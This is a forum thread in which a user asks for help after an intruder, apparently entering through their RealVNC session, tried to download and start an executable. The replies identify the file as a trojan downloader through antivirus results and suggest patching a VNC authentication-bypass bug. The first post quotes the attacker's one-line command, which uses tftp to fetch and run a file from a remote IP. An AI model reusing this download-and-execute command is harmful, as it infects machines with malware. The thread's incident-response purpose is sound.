Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations Chris Miller on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

what does the jalqi.exe? and how to clean it?

Status
Not open for further replies.

sugarferret

IS-IT--Management
Jul 11, 2005
33
US
Hi, yesterday I open a RealVNC server port for support purposes from a company in Seoul Korea, the support time was nice and useful, the thing here is that a illegal third vnc client/child I dont know how some other person gained access to the vnc server but he tried to run this command on my machine:
" %comspec% /c tftp -i 83.226.184.184 GET jalqi.exe & start jalqi "
obviously he tried to copy a daemon from 83.226.184.184 (wich is in Stockholm, Sweden) host and bring it up.
The command was interrupted because i was typing at the time of the failed hack attack so the command was not typed correctly thanks God.

Now, i would like to know what these daemon does and how can I be sure that I am not infected.

Thanks in advance.!
Aldo

Live as a tortoise.
and rate my mullet:
 
A quick look at it shows it opens a URL and downloads something. So obviously it is a downloader of some sort. VirusTotal says:

Code:
AntiVir	7.3.1.34	02.03.2007	TR/Dldr.Agent.bft
Authentium	4.93.8	02.03.2007	no virus found
Avast	4.7.936.0	02.03.2007	no virus found
AVG	386	02.03.2007	no virus found
BitDefender	7.2	02.04.2007	Trojan.Downloader.Agent.BFT
CAT-QuickHeal	9.00	02.03.2007	no virus found
ClamAV	devel-20060426	02.03.2007	no virus found
DrWeb	4.33	02.03.2007	Trojan.Domort
eSafe	7.0.14.0	02.03.2007	Win32.Agent.bft
eTrust-InoculateIT	30.4.3364	02.02.2007	no virus found
eTrust-Vet	30.3.3366	02.03.2007	no virus found
Ewido	4.0	02.03.2007	Downloader.Agent.bft
Fortinet	2.85.0.0	02.03.2007	W32/Agent.BFT!tr.dldr
F-Prot	4.2.1.29	02.03.2007	no virus found
Ikarus	T3.1.0.31	02.03.2007	Trojan-Spy.Win32.Delf.OR
Kaspersky	4.0.2.24	02.04.2007	Trojan-Downloader.Win32.Agent.bft
McAfee	4955	02.02.2007	no virus found
Microsoft	1.2101	02.03.2007	no virus found
NOD32v2	2035	02.03.2007	probably unknown NewHeur_PE virus
Norman	5.80.02	02.02.2007	W32/Backdoor.AG
Panda	9.0.0.4	02.03.2007	Trj/Agent.DYV
Prevx1	V2	02.04.2007	no virus found
Sophos	4.13.0	02.02.2007	Troj/Agent-EBJ
Sunbelt	2.2.907.0	02.02.2007	no virus found
Symantec	10	02.04.2007	no virus found
TheHacker	6.0.3.162	02.02.2007	Trojan/Downloader.Agent.bft
UNA	1.83	02.03.2007	TrojanDownloader.Win32.Agent.23FE
VBA32	3.11.2	02.03.2007	Trojan-Downloader.Win32.Agent.bft
VirusBuster	4.3.19:9	02.03.2007	no virus found

It is PE Packed, it has a few versions of ASPack on it as well, so without really getting in to it and possibly doing a live analysis (which I currently lack a machine to sacrifice to test), unfortunately I can't give you much more than that.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
What you need to do is upgrade your VNC to 4.1.2 as the versions older than 4.1.2 had a nasty little bug that bypassed authentication.

RoadKi11
 
Actually I have 4.2.x... by the way, how its possible the fact that a 3rd person can gain access to the realvnc session?



Live as a tortoise.
and rate my mullet:
 
Not sure. if you are using 4.2.x then you are using the enterprise version according to the website, ive never used anything but the free version which is at version 4.1.2. maybe the enterprise versions allows multiple connections. looks like the enterprise version is at 4.2.8 if you are not up to that level i would upgrade it as im sure the older versions of enterprise were also affected by the bypass bug.

RoadKi11
 
Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back
Top